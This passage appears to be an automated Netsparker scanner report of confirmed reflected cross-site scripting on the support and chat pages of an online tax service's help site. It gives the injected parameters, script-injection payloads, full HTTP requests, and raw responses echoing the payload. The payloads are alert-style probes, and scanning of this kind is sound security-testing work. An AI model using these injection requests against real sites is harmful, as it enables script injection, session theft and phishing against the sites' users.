if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006C5)%5C/script%5E&p_sid=aZgX2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006C5)%5C/script%5E&p_sid=aZgX2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006C5)%5C/script%5E&p_sid=aZgX2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006C5)%5C/script%5E&p_sid=aZgX2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x0006C5)</script>&p_sid=aZgX2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td> <td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td> </tr> <tr> <td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td class="form"> <form name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;"> <table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" style="display: none"> <tr> <td align="center">You must enable JavaScript in order to use Chat. Please enable your browser's JavaScript setting for this site and refresh this page.</td> </tr> </table> <table id="tbl_login" name="tbl_login" width="100%" cellspacing="1" cellpadding="1" border="0" > <tr> <td colspan="2" class="subtitle"> <table cellpadding="1" cellspacing="0" border="0"> <tr><td class="bar" colspan="2"><h2 class="subtitle" >&nbsp;Chat with a Support Agent</h2></td></tr> </table> </td> </tr> <!-- Notes ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="label" colspan="2">Please Note: <br /> <table cellpadding="0&quo..
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541
p_sid GET TyYLtJsk
p_accessibility GET 0'"--></style></script><script>alert(0x0006E6)</script>
p_redirect GET 3
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0006E6)%3C%2Fscript%3E&p_redirect=3&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:55:47 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=77829 t=1304117747849889
RNT-Machine: 02
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4323
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541&p_sid=rB_Z2Ksk&amp;p_accessibility=0'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006E6)%5C/script%5E&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541&p_sid=rB_Z2Ksk&amp;p_accessibility=0'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006E6)%5C/script%5E&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541&p_sid=rB_Z2Ksk&amp;p_accessibility=0'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006E6)%5C/script%5E&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541&p_sid=rB_Z2Ksk&amp;p_accessibility=0'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006E6)%5C/script%5E&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=OLTFree73541&p_sid=rB_Z2Ksk&amp;p_accessibility=0'"--></style></script><script>netsparker(0x0006E6)</script>&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td> <td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td> </tr> <tr> <td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td class="form"> <form name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;"> <table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" style="display: none"> <tr> <td align="center">You must enable JavaScript in order to use Chat. Please enable your browser's JavaScript setting for this site and refresh this page.</td> </tr> </table> <table id="tbl_login" name="tbl_login" width="100%" cellspacing="1" cellpadding="1" border="0" > <tr> <td colspan="2" class="subtitle"> <table cellpadding="1" cellspacing="0" border="0"> <tr><td class="bar" colspan="2"><h2 class="subtitle" >&nbsp;Chat with a Support Agent</h2></td></tr> </table> </td> </tr> <!-- Notes ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="label" colspan="2">Please Note: <br /> <table cellpadding="0&quo..
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET '"--></style></script><script>alert(0x0006EB)</script>
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0006EB)%3C%2Fscript%3E&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:55:51 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=72818 t=1304117751265452
RNT-Machine: 12
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4326
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" 